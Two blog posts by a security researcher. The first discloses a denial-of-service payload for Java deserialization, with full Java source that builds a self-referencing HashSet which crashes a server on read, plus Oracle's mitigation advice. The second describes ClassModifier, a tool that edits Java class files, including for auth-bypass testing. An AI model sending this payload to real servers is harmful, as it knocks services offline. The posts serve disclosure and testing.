Tuesday, February 19, 2019

DOS Payload (works on latest JRE) for Java Deserialization issue

Reading the below serialized payload by server using the latest JRE version (or older), can cause instant crash on server (StackOverflow error)

Payload:
https://github.com/csanuragjain/extra/blob/master/Deserialization%20issue/payloadNew.txt?raw=true

How is it created:

import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;


public class Payload2 {

/**
 * @param args
 * @throws Exception 
 */
public static void main(String[] args) throws Exception {
// TODO Auto-generated method stub
        Set s= new HashSet<>();
        Set entry= new HashSet();
        s.add(entry);
        entry.add(entry);
        FileOutputStream fos = new FileOutputStream("payloadNew.txt");
        ObjectOutputStream oos = new ObjectOutputStream(fos);
        oos.writeObject(s);
        oos.flush();
}

}

What happens when server reads it:
Server crash with StackOverflow error

What Oracle has to say:
There is no default JEP 290 serial filter that applies to all RMI
applications and eliminates all issues.  It is up to the application
writer to choose the configuration that makes an application the safest
it can be (given it's deserializing untrusted data).  In the given
examples HashMap and HashSet could be blocked to eliminate that issue.

In short, Oracle asks to block both of these classes using the serial Filter.

My thoughts:
Not quite sure, why an internal loop is even allowed.
The best way to mitigate this issue is not to trust any user provided serialized data. But if you have to read it then you need to be aware about these issues and should completely block these classes atleast (Although i think some other payload will always come)

Let me know your thoughts...

Monday, January 28, 2019

ClassModifier : Utility to easily modify your Java class files

Modify your Java class files easy with an interactive GUI.

Since it is not possible to edit a class file directly, this tool changes the class file to Smali version which is editable. After making the required changes, this tool converts the modified Smali to the modified Class file.
Features:
  • Modify a given Java class file
  • Allows Pen-tester to verify if their java desktop application is safe from Auth bypass
  • Can help you change the logical behavior of a Jar file by modifying a class
  • You can override private methods, change access modifier for variables of a class using ClassModifier.
  • Many other possibilities....

Download ClassModifier:



How to Use:

java -jar ClassModifier.jar

Menu:

File
  1. Open class (CTRL+O)- Takes the input class which need to be modified
  2. Open Project (CTRL+P)– You can reopen the project created using this feature.
  3. Save & Convert (CTRL+S) – Saves & Convert the code to modified Class and Smali file
  4. Export Class (CTRL+E) – Export modified class
  5. Java 2 Smali Helper - Opens a tab where you can write any Java code which on saving will show its equivalent Smali code
  6. Smali 2 Java code - Opens a tab where you can write any Smali code which on saving will show its equivalent Java code
Edit
  1. Increase Code FontSize (CTRL+I) – Allows you to increase font size of shown code.
  2. Decrease Code FontSize (CTRL+D) – Allows you to decrease the font size of shown code.
  3. Remove all tabs – Removes all currently shown tabs.
Decompiler
  1. Change Decompiler – Allows you to switch between jadx and jd-cli decompilers.

Help
  1. Update Software – Helps you to update the current software if any update is available
  2. How to use Class Modifier– Contains the documentation of this tool

Toolbar
  1. Allows you to find in current code/replace/replaceAll/find all class

ClassModifier_lib Folder

  1. It comes along with the software
  2. Contains the helper jars used by program
  3. ClassModifier_lib\userLibrary is automatically added in classpath while compiling code. If you wish to compile your code using external jars then place those external jars inside ClassModifier_lib\userLibrary

How to Use:
  • Open the Java class to be Modified
  • On opening, ClassModifier will open the Smali version of the class file
  • Edit the smali file and make the required changes
  • Save the smali file 
  • Modified java class file will be created which can be anytime exported using the File -> Export Class button.
  • Since Smali editing can be difficult, 2 options are provided - Java 2 Smali Helper and vice-versa.
  • As name suggests, Java 2 Smali Helper lets you see the Smali equivalent code for the input Java code.
  • Similarly, Smali 2 Java Helper lets you see the Java equivalent code for the input Smali code.

Screenshot:




Note: This software is meant for educational purpose only. Don't use it for any illegal activity.